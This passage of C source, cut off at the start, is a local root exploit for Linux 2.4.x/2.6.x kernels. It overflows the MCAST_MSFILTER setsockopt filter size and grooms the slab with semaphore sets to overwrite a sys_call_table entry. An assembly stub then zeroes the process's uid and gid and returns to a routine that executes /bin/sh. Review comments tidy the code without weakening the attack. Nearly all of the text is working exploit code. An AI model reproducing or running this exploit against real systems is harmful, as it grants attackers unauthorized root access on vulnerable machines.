#endif
        64,
        128,
        256,
        512,
        1024,
        2048,
        4096,
        8192,
        16384,
        32768,
        65536,
        131072,
    };
    const int count = (int)(sizeof(cache_sizes) / sizeof(cache_sizes[0]));
    int i;

    for (i = 0; i < count; i++) {
        if (cache_sizes[i] >= slabsize) {
            return cache_sizes[i];
        }
    }

    /* larger than every cache: leave the value as it is */
    return slabsize;
}

/*
 * Looks up the address listed for "sys_call_table" in /proc/ksyms.
 *
 * Each line is parsed as "<hex address> <symbol>"; the first line whose
 * symbol contains "sys_call_table" is echoed to stdout and its address is
 * returned.
 *
 * Returns the address, or 0 when the file cannot be opened or no matching
 * line exists.
 *
 * Fixes over the original:
 *  - the fopen() failure path used a bare "return;" in a function returning
 *    unsigned long; it now returns 0.
 *  - the address was scanned with %x into an unsigned long; %lx matches the
 *    variable's type.
 *  - the symbol was scanned with an unbounded %s into a 64-byte buffer; the
 *    field width is now limited to 63.
 *  - the line was passed to printf() as the format string; it is now written
 *    with fputs().
 *  - the loop was "while (!feof) { if (!fgets) continue; }", which never
 *    terminates on a read error; fgets() itself is now the loop condition.
 */
unsigned long get_sys_call_table(void)
{
    FILE *fp;
    char linebuf[128];
    char symbol[64];
    unsigned long addr = 0;
    unsigned long result = 0;

    fp = fopen("/proc/ksyms", "r");
    if (fp == NULL) {
        perror("fopen /proc/ksyms");
        return 0;
    }

    while (fgets(linebuf, sizeof(linebuf), fp) != NULL) {
        if (sscanf(linebuf, "%lx %63s", &addr, symbol) != 2) {
            continue;
        }
        if (strstr(symbol, "sys_call_table") == NULL) {
            continue;
        }

        fputs(linebuf, stdout);
        result = addr;
        break;
    }

    fclose(fp);
    return result;
}

/*
 * Create SysV semaphore sets sized to land in the "size-<slabsize>" cache.
 *
 * slabsize: object size; rounded with fix_slabsize() before use.
 * left:     subtracted from (total - active) as read from /proc/slabinfo to
 *           get the loop limit used below.
 *
 * The matching /proc/slabinfo line is echoed to stdout. The ids returned by
 * semget() (including -1 on failure) are stored in sem_handles[] and
 * sem_count is advanced; de_prepare_slab() removes them again. Nothing is
 * created when /proc/slabinfo cannot be opened or has no matching line.
 */
static void prepare_slab(int slabsize, int left)
{
    FILE *fp;
    char linebuf[128];
    int found = 0;
    int s_size, s_active, s_total;
    int nsems;
    int i, num;

    slabsize = fix_slabsize(slabsize);
    nsems = COMPUTE_NSEMS(slabsize);

    fp = fopen("/proc/slabinfo", "r");
    if (fp == NULL) {
        perror("fopen /proc/slabinfo");
        return;
    }

    /* Stop on EOF or read error instead of spinning on a failed fgets(). */
    while (fgets(linebuf, sizeof(linebuf), fp)) {
        if (sscanf(linebuf, "size-%d %d %d", &s_size, &s_active, &s_total) != 3)
            continue;
        if (s_size != slabsize)
            continue;

        /* The line is file data, never a format string. */
        fputs(linebuf, stdout);
        found = 1;
        break;
    }
    fclose(fp);

    if (!found)
        return;

    num = s_total - s_active - left;
    if (num > MAX_SEM_LIMIT - sem_count)
        num = MAX_SEM_LIMIT - sem_count;

    /*
     * NOTE(review): the index starts at sem_count but is compared against
     * num, so on any call after the first fewer than num sets are created.
     * Kept exactly as in the original; confirm whether that is intended.
     */
    for (i = sem_count; i < num; i++, sem_count++)
        sem_handles[i] = semget(IPC_PRIVATE, nsems, IPC_CREAT);
}

/*
 * Remove every semaphore set recorded in sem_handles[] and reset sem_count.
 * Slots holding -1 are skipped; a failing IPC_RMID is reported through
 * perror() and the sweep continues with the next slot.
 */
static void de_prepare_slab()
{
    int *slot = sem_handles;
    int *end = sem_handles + sem_count;

    while (slot < end) {
        int id = *slot++;

        if (id == -1)
            continue;
        if (semctl(id, 0, IPC_RMID))
            perror("ipc_rmid");
    }

    sem_count = 0;
}

/*
 * Replaces the current process image with /bin/sh.
 * Its address is pushed as the return EIP by the load_highlevel asm stub.
 */
void shellcode(void)
{
/* argv for the new program: program name only, NULL-terminated. */
char *p[] ={"/bin/sh", 0};
// de_prepare_slab();
execve("/bin/sh",p,0);
/* Only reached if execve() fails. */
_exit(0);
}

/*
 * Record per-process values in the file-scope globals: task_size, uid, gid
 * and the current user_ds / user_cs segment selectors.
 *
 * NOTE(review): myget_ds() and myget_cs() are defined further down the file
 * and are called here without a prior declaration.
 */
void configure(void)
{
unsigned val;
/*
 * Address of a stack local, advanced by 1 GiB and truncated to a 1 GiB
 * multiple ("1 GB" expands to 1 * 1024 * 1024 * 1024). The pointer-to-unsigned
 * cast assumes 32-bit pointers.
 */
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
uid = getuid();
gid = getgid();
user_ds = myget_ds();
user_cs = myget_cs();

}
/*
 * Scan forward from `task`, one word at a time, for four consecutive words
 * equal to the global uid, then zero those four words and the four after.
 *
 * NOTE(review): the scan has no upper bound, and this function is not called
 * from any code visible in this section of the file.
 */
void kernel(unsigned * task)
{
unsigned * addr = task;

/* looking for uids */
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid
)
addr++;

addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}

/*
 * Search the memory starting at `ts` for a uid/gid pattern and zero it.
 *
 * ts: start address; called from the load_highlevel asm stub with
 *     (esp & 0xffffe000) as the argument.
 *
 * Words 0,1 must equal the global uid and words 4,5 the global gid; words
 * 2 and 3 are not examined or modified.
 */
void set_root(unsigned int *ts)
{
/* If the first word is non-zero, treat it as a pointer and scan from there instead. */
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;

int cntr;
/* 513 candidate positions are checked; the loop keeps going after a match. */
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}

/*
 * Copies the %cs segment register into %eax.
 * NOTE(review): there is no return statement; the caller's result depends on
 * %eax being left untouched as the return register (i386 convention, and
 * only if the compiler does not reuse it) -- confirm build flags.
 */
int myget_cs()
{
__asm__("movl %cs,%eax\n");
}
/*
 * Copies the %ds segment register into %eax.
 * NOTE(review): there is no return statement; the caller's result depends on
 * %eax being left untouched as the return register (i386 convention, and
 * only if the compiler does not reuse it) -- confirm build flags.
 */
int myget_ds()
{
__asm__("movl %ds,%eax\n");
}

/*
 * kernel 2.4.x/2.6.x privilege elevator
 *
 * load_highlevel is a file-scope asm label. main() takes its address and
 * writes that address into the pipe. The stub calls set_root() with
 * (esp & 0xffffe000), then builds an iret frame that resumes at shellcode()
 * using the user_cs / user_ds selectors saved by configure().
 *
 * NOTE(review): the declaration below has no type (implicit int); only the
 * symbol's address is used.
 **/
extern load_highlevel;
__asm__
(
"load_highlevel: \n\t"
/* eax = esp & 0xffffe000 (presumably the base of an 8 KiB kernel stack -- confirm) */
"mov $0xffffe000,%eax\n\t"
"and %esp,%eax \n\t"
/* set_root(eax), then discard the argument */
"pushl %eax \n\t"
"call set_root \n\t"
"pop %eax \n\t"
"cli \n\t"
/* load the saved user_ds value into %ds */
"movl $user_ds,%eax \n\t"
"pushl (%eax)\n"
"pop %ds \n\t" /* DS */
/* iret frame, pushed in order: SS, ESP, EFLAGS, CS, EIP */
"pushl %ds \n\t" /* SS */
"pushl $0xc0000000 \n\t" /* ESP */
"pushl $0x246 \n\t" /* EFLAGS */
"movl $user_cs,%eax \n\t" /* CS */
"pushl (%eax) \n\t"
"pushl $shellcode \n\t"
"iret \n\t"
);

/*
 * Program entry point.
 *
 * Usage: run without arguments for the full sequence, or with "-w" to print
 * the computed numsrc/msize/gsize/optlen values and exit.
 *
 * Returns EXIT_SUCCESS after the second child has been reaped, or
 * EXIT_FAILURE through the err: cleanup path when a setup step fails.
 */
int main(int argc, char *argv[])
{
int sock = -1;
int victim_pipe[2] = {-1, -1};
int holderid = -1;
struct group_filter *gsf = NULL; /* &optval */
int optlen, optlen_align;
int nsems;
int pid;
int status;

unsigned int numsrc, full_numsrc, of_numsrc /* overflow numsrc */;
int msize, gsize, i;
struct sockaddr_in *psin;

/* Requires /proc/ksyms to export sys_call_table; 0 means not found. */
sys_call_table = (void *) get_sys_call_table();
if (!sys_call_table)
goto err;

sock = socket(PF_INET, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
goto err;
}

/* Option buffer: one group_filter plus MY_NUMSRC-1 extra source slots, then rounded by fix_slabsize(). */
optlen = sizeof(struct group_filter) +
sizeof(struct sockaddr_storage) * (MY_NUMSRC-1);
optlen_align = fix_slabsize(optlen);
/*
* (kernel-2.4.22)
* ...
* define IP_MSFILTER_SIZE(numsrc) \
* (sizeof(struct ip_msfilter) - sizeof(__u32) \
* + (numsrc) * sizeof(__u32))
*/
/*
 * Unsigned arithmetic: when sizeof(struct ip_msfilter) exceeds 8 the first
 * term wraps around. The sample run in the file header shows
 * numsrc 0x4000000c and msize 0x40.
 */
numsrc = ((4 - (sizeof(struct ip_msfilter) - 4)))/4 + (SLAB_SIZE - 4)/4;
msize = IP_MSFILTER_SIZE(numsrc);
gsize = GROUP_FILTER_SIZE(numsrc);
printf("numsrc: 0x%x msize: 0x%x gsize: 0x%x optlen: 0x%x\n",
numsrc, msize, gsize, optlen);

/* "-w": only print the computed sizes above, then stop. */
if (argc == 2 && !strcmp(argv[1], "-w"))
exit(EXIT_SUCCESS);

/* Allocated with the rounded size, but only the first optlen bytes are filled with 'A'. */
gsf = malloc(optlen_align);
if (gsf == NULL) {
perror("malloc");
goto err;
}
memset(gsf, 'A', optlen);

/*
* Prepare
**/
printf("Prepare ...\n");
gsf->gf_numsrc = numsrc;
gsf->gf_interface = 0;
gsf->gf_fmode = 0;
psin = (struct sockaddr_in *) &gsf->gf_group;
psin->sin_family = AF_INET;

/* Source slots [0, MY_NUMSRC): AF_INET with marker address 0x43434343. */
for (i = 0; i < MY_NUMSRC; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x43434343;
}

full_numsrc = (optlen_align - sizeof(struct group_filter))
/ sizeof(gsf->gf_slist[0]) + 1 + 1;
of_numsrc = full_numsrc
- ((SLAB_SIZE - 20 /* sizeof(struct ip_msfilter) */) / 4 + 1);
printf("full_numsrc: %d \toverflow_numsrc: %d\n", full_numsrc, of_numsrc);

/* Source slots [MY_NUMSRC, full_numsrc): AF_INET with marker address 0x44444444 (i continues from the loop above). */
for (; i < full_numsrc; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x44444444;
}
/* The slot index computed below is only valid for exactly three overflow entries. */
assert(of_numsrc == 3);
/* The last filled slot's address is replaced by the address of sys_call_table[__NR_hijack_getroot] (cast assumes 32-bit pointers). */
psin = (struct sockaddr_in *) &gsf->gf_slist[full_numsrc-of_numsrc-1+3]; /* char *base */
psin->sin_addr.s_addr = (unsigned int) &sys_call_table[__NR_hijack_getroot];

/* First call passes the rounded length; its return value is not checked. */
setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen_align);
prepare_slab(SLAB_SIZE, -1);
prepare_slab(SLAB_SIZE, 4);

/* One more semaphore set, tracked separately from sem_handles[]. */
nsems = COMPUTE_NSEMS(SLAB_SIZE);
holderid = semget(IPC_PRIVATE, nsems, IPC_CREAT);
if (holderid == -1) {
perror("semget IPC_NEW");
goto err;
}

if (pipe(victim_pipe) == -1) {
perror("pipe");
goto err;
}

/*
 * NOTE(review): IPC_RMID is issued twice on holderid (here and after the
 * printf); holderid is not reset, so the err: path may issue it a third time.
 */
semctl(holderid, 0, IPC_RMID);
printf("Exploiting ...\n");
semctl(holderid, 0, IPC_RMID);
/* Second call passes the unrounded optlen; a failure is reported but execution continues. */
if (setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen) == -1)
perror("setsockopt");

/*
* Get root
**/
char *p_load_highlevel = (void *) &load_highlevel;
/* First child: writes the 4-byte address of load_highlevel into the pipe, with a 1 s alarm armed beforehand. */
if (fork() == 0)
{
int cnt;
close(0);
close(1);
close(2);
alarm(1);
cnt = write(victim_pipe[1], &p_load_highlevel, 4);
//cnt = read(victim_pipe[0], buf, 0); /* for test base_addr */
/*
 * NOTE(review): stderr was closed above, so this perror has nowhere to
 * write, and the goto runs the parent's cleanup path inside the child.
 */
if (cnt == -1) {
perror("write pipe");
goto err;
}
exit(0);
}
/* Fixed delay; the first child is never waited for explicitly. */
sleep(2);

/* Second child: records uid/gid/selectors, then issues syscall number __NR_hijack_getroot. */
if ((pid = fork()) == 0) {
configure();
hijack_getroot(0);

/* Reached only if the syscall above returns. */
printf("Failed to get root!\n");
_exit(-1);
}

/* Block until waitpid() reports an error (e.g. no such child remains). */
while (1) {
if (waitpid(pid, &status, 0) < 0)
break;
}

de_prepare_slab();
free(gsf);
close(sock);

close(victim_pipe[0]);
close(victim_pipe[1]);
return EXIT_SUCCESS;
err:
/* NOTE(review): "> 0" also skips a valid descriptor 0; the initial value is -1. */
if (victim_pipe[0] > 0) {
close(victim_pipe[0]);
close(victim_pipe[1]);
}

de_prepare_slab(); /* it's safe */

if (holderid != -1)
semctl(holderid, 0, IPC_RMID);
if (gsf)
free(gsf);
if (sock != -1)
close(sock);
return EXIT_FAILURE;
}